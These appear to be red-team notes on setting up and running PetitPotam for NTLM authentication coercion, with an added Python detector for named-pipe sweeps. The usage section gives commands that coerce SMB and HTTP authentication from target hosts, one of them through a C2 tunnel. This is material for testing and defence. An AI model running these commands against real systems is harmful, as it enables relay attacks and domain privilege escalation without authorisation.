These tool installs assume that virtualenv is available.

apt update
apt install python3-virtualenv

Note on virtualenv usage:

  • these containers are used to allow conflicting dependency installs to live side by side harmoniously
  • activate / deactivate dependency containers for proper usage
    • prompt# source demo-env/bin/activate
    • prompt(demo-env)# deactivate
  • with screen/tmux, multiple dependency containers can be activated at the same time

PetitPotam can be installed on its own, in which case the install pulls in Impacket, or it can be installed into an already activated Impacket environment.

Possible Blurb

The coercion technique has become a common approach to generating authentication events from remote systems. In some scenarios, the coerced authentication can be relayed for various purposes, including privilege escalation or certificate issuance. PetitPotam was a purpose-built tool that can enumerate SMB pipes and test remote systems for various configurations that may trigger the coerced authentication events.
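The SMB pipe enumeration described above shows up on the defender's side as a burst of named-pipe opens on IPC$ from a single source. The following is an added example, not part of the original notes or of PetitPotam, that flags such bursts in parsed Windows Security event 5145 records. The watched pipe list, the thresholds and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Named pipes often probed during coercion attempts (assumed list; tune per environment).
WATCHED_PIPES = {"lsarpc", "efsrpc", "efsr", "samr", "lsass", "netlogon"}

def _ev(time, src, share, target, host="dc01"):
    """Build one constructed record using event 5145 field names."""
    return {"time": time, "Computer": host, "IpAddress": src,
            "ShareName": share, "RelativeTargetName": target}

# Constructed sample data, not real logs.
SAMPLE_EVENTS = [
    _ev("2024-01-10T09:00:01", "10.10.10.50", r"\\*\IPC$", "lsarpc"),
    _ev("2024-01-10T09:00:02", "10.10.10.50", r"\\*\IPC$", "efsr"),
    _ev("2024-01-10T09:00:02", "10.10.10.50", r"\\*\IPC$", "samr"),
    _ev("2024-01-10T09:00:03", "10.10.10.50", r"\\*\IPC$", "lsass"),
    _ev("2024-01-10T09:00:04", "10.10.10.50", r"\\*\IPC$", "netlogon"),
    # Routine client: same pipes, but hours apart.
    _ev("2024-01-10T08:00:00", "10.10.10.20", r"\\*\IPC$", "samr"),
    _ev("2024-01-10T10:00:00", "10.10.10.20", r"\\*\IPC$", "lsarpc"),
    _ev("2024-01-10T12:00:00", "10.10.10.20", r"\\*\IPC$", "netlogon"),
    # Ordinary file access on another share is ignored.
    _ev("2024-01-10T09:00:05", "10.10.10.30", r"\\*\SYSVOL", "example.com\\Policies"),
]

def find_pipe_sweeps(events, window=timedelta(seconds=60), min_pipes=3):
    """Return (source, host, pipes) for sources opening >= min_pipes watched
    pipes on one host's IPC$ share within `window`."""
    by_pair = defaultdict(list)
    for ev in events:
        pipe = ev["RelativeTargetName"].lower()
        if ev["ShareName"].upper().endswith("IPC$") and pipe in WATCHED_PIPES:
            when = datetime.fromisoformat(ev["time"])
            by_pair[(ev["IpAddress"], ev["Computer"])].append((when, pipe))
    alerts = []
    for (src, host), hits in by_pair.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            pipes = {p for t, p in hits[i:] if t - start <= window}
            if len(pipes) >= min_pipes:
                alerts.append((src, host, sorted(pipes)))
                break  # one alert per source/host pair
    return alerts

if __name__ == "__main__":
    for src, host, pipes in find_pipe_sweeps(SAMPLE_EVENTS):
        print(f"possible pipe sweep: {src} -> {host}: {', '.join(pipes)}")
```

Event 5145 is only written when the "Audit Detailed File Share" policy is enabled on the monitored hosts.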

Usage

Some possible scenarios for using PetitPotam look like the following.

Trigger SMB Authentication

python3 PetitPotam.py <hostIP> -u 'user' -d 'domain.tld' -p 'Password1'

Trigger HTTP Authentication via C2

  • note: the below works through proxychains, targeting a box with established C2 and an open 8080 tunnel

python3 PetitPotam.py localhost@8080/blah <hostIP> -u 'user' -d 'domain.tld' -p 'Password1'

Trigger HTTP Authentication via exposed WebDav service

python3 PetitPotam.py 10.10.10.100@8080/blah <hostIP> -u 'user' -d 'example.com' -p 'Password1'